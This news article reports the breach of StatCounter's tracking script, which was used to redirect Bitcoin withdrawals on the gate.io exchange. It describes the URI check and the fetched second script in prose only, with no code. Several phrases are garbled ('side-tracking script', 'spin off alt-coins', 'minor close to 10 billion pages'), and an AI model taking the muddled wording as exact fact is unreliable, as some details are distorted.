- The hijackers redirected Bitcoin withdrawals to a separate Bitcoin address
Hackers breached StatCounter, a leading traffic metrics website and secretly injected a malicious code into the firm’s main side-tracking script. The cybercriminals have been using it to steal Bitcoin from the gate.io cryptocurrency exchange.
Malicious code inserted
ESET malware researcher Matthieu Faou, who discovered the hack, said the attack took place on November 3rd, and explained that the malicious code can hijack Bitcoin transactions executed through Gate.io Cryptocurrency Exchange’s web interface and could easily spin off alt-coins. The attackers changed Gate.io’s side-tracking script from the exchanges withdrawal page, as reported by ZEDNET.
Faou said even though millions of websites could have easily pulled the changed code; it appears like that miscreants specifically targeted one site since the malicious code they discovered within the StatCounter script could only perform a single check for a specific path: myaccount/withdraw/BTC. Faou explained:
“The script targets a specific Uniform Resource Identifier (URI): myaccount/withdraw/BTC. It turns out that among the different cryptocurrency exchanges live at the time of writing, only gate.io has a valid page with this URI, thus, this exchange seems to be the main target of this attack.”
They designed the malicious path such that whenever a visitor accessed it, it created a second script on a different domain that fetched and executed. That script then tried to direct Bitcoin transactions to one of the numerous wallets the masterminds of the attack were using. The researcher, however, could not establish the exact amount of funds stolen since the criminals were using multiple wallets even though they believe the loss could have been significant. Both Gate.io and StatCounter have not given official communication about the alleged incident.
Not the first such attack
StatCounter is used by over 2 million websites to track their platforms to minor close to 10 billion pages every month and this, therefore, could have been the motivation of the attackers. Faou added:
“This redirection is probably unnoticeable to the victims, since the replacement is performed after they click on the submit button […] thus, it will happen very quickly and would probably not even be displayed.”